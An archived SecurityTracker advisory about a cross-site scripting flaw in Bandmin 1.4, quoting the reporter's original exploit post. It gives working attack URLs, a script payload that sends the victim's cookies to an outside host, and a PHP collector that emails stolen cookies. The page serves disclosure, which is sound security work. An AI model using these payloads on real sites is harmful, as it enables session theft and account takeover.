Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Bandmin Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1006873
|
|
CVE Reference: CAN-2003-0416
(Links to External Site)
|
Updated: Jan 20 2004
|
Original Entry Date: May 29 2003
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 1.4
|
Description: An input validation vulnerability was reported in the Bandmin bandwidth monitor. A remote user can conduct cross-site scripting attacks.
It is reported that the software does not filter HTML from user-supplied input. A remote user can create a specially crafted URL
that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will
originate from the site running Bandmin and will run in the security context of that site. As a result, the code will be able to
access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted
by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit
URLs are provided:
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]&month=[SECOND SCRIPT]
http://[site]/bandwidth/index.cgi?action=showhost&mo
nth=May&year=2003&host=[THIRD SCRIPT]
In place of the [SCRIPT] tag, use the following [unescaped, of course]:
<script>document.location='http://any-web-site/cookies
.php?'+document.cookie</script>
Then, the cookies.php script at 'any-web-site' can capture the target user's cookies.
[Editor's
note: We were unable to find an active vendor web site at the time of this entry.]
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
Bandmin software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
|
Solution: No solution was available at the time of this entry.
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: silent needel <silentneedle@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 28 May 2003 16:38:40 -0000
From: silent needel <silentneedle@hotmail.com>
Subject: Bandmin 1.4 XSS Exploit
|
Bandmin 1.4 XSS Exploit by Silent Needle
A:BACKGROUND
Bandmin is a cgi script show you the bandwidth for the sites in the server.
B:DESCRIPTION
The cross site scripting allow you to print a html or javascript or others
in the webpage
when it just open not write in the page.
C:EXPLOIT
These are the URLs of the exploits:
1-there is two here
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]
&month=[SECOND SCRIPT]
2-one here
http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=
[THIRD SCRIPT]
And you can steal cookie by changing [*** script] to
<script>document.location='http://any-web-
site/cookies.php?'+document.cookie</script>
and in http://any-web-site/cookie.php put
----------------cookie.php-------------------
<?
mail("silentneedle@hotmail.com","cookies from bandmin",$http_cookie);
echo $http_cookie;
?>
-----------------------------------------------
D:GREETZ
To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN
AWAY :)
E:CONTACT
Silent Needle
silentneedle@hotmail.com
F:OH LONG NIGHT
Bye
|
|
Go to the Top of This SecurityTracker Archive Page
|
